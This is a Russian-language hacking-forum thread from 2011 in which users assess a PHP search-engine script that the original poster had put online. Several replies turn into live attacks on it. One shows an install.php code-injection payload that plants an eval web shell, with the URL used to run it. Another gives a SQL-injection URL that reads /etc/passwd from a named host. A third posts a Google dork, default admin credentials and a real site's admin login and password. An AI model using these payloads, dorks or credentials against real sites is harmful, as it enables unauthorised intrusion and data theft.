Стоит ли использовать эту cms

Discussion in 'Песочница' started by naPrikole, 18 Oct 2011.

  1. naPrikole

    naPrikole New Member

    Joined:
    13 Oct 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    народ мне нужно ваше мнение стоит ли использовать вот http://magicsearch.pp.ua cms вот ДЕМО ой сори эт наверно не cms а скрипт
     
    #1 naPrikole, 18 Oct 2011
    Last edited: 18 Oct 2011
  2. HIMIKAT

    HIMIKAT Elder - Старейшина

    Joined:
    12 Jan 2007
    Messages:
    2,707
    Likes Received:
    581
    Reputations:
    403
    По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.
     
  3. Exandr

    Exandr New Member

    Joined:
    21 Aug 2010
    Messages:
    97
    Likes Received:
    4
    Reputations:
    0
    А там написано скрипт поисковой ситемы) причем тут CMS
     
  4. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Oops..

    Need: magic_quotes =Off
    install.php
    PHP:
    [...]
    if(isset($_POST['go_ed'])) {

        if (!is_writable("settings/database.php")) {
            print "<p style='color:#FF0033'><strong>Файла database.php несуществует или незаданы права доступа 666</strong></p>";
        } else {
            $fhandle=fopen("settings/database.php","w");
            fwrite($fhandle,"<?php \n");
            fwrite(
    $fhandle,"/***********************\n Файл БД\n***********************/\n");
            fwrite(
    $fhandle,"$"."database    '". $_POST['_database']. "';\n");
            fwrite(
    $fhandle,"$"."mysql_user    '".$_POST['_mysql_user']. "';\n");
            fwrite(
    $fhandle,"$"."mysql_password    '".$_POST['_mysql_password']. "';\n");
            fwrite(
    $fhandle,"$"."mysql_host    '".$_POST['_mysql_host']. "';\n");
            fwrite(
    $fhandle,"$"."mysql_table_prefix    '".$_mysql_table_prefix. "';\n\n\n");
    [....]
    Заходим на install.php
    И в поле "Сервер MySQL":
    Code:
    '; eval($_GET['cmd']); exit(); /**
    http://23rus.sytes.net/settings/database.php?cmd=phpinfo();



    UPD: Смотрю ты уже снес все к чертям)
     
    1 person likes this.
  5. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+

    Сноси в общем.
    Код писала курица.

    p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.
     
    2 people like this.
  6. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    на многих сайтах логин/пароль - moders
    админка - /admin/
    Google Dork:"Created by Kiria-Studio"
    http://search.afu-time.com/admin/index.php - sorokin96:25101996 (не тот ли это кирил - разработчик? :D)
     
  7. naPrikole

    naPrikole New Member

    Joined:
    13 Oct 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    да эт я чуток попутал :)
     
  8. naPrikole

    naPrikole New Member

    Joined:
    13 Oct 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    ну да снес конечно !!!!
     
  9. naPrikole

    naPrikole New Member

    Joined:
    13 Oct 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    ясен хрен он фришный я же на своем компе сайт повесил :)
     
  10. Letcher

    Letcher New Member

    Joined:
    10 Nov 2011
    Messages:
    44
    Likes Received:
    4
    Reputations:
    0
    всмысле на своем компе? на сервере?
     
  11. naPrikole

    naPrikole New Member

    Joined:
    13 Oct 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    да !!!
     
  12. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,028
    Likes Received:
    310
    Reputations:
    86
    Я так и не понял, ты автор этой CMS?
     
    _________________________
  13. naPrikole

    naPrikole New Member

    Joined:
    13 Oct 2011
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    нет и это и не сиэмс вовсе просто я не так выразился !!! а скрипт поисковой системы та и вобщемто я его удалил уже !!!! щас виртуальными серверами занимаюсь :)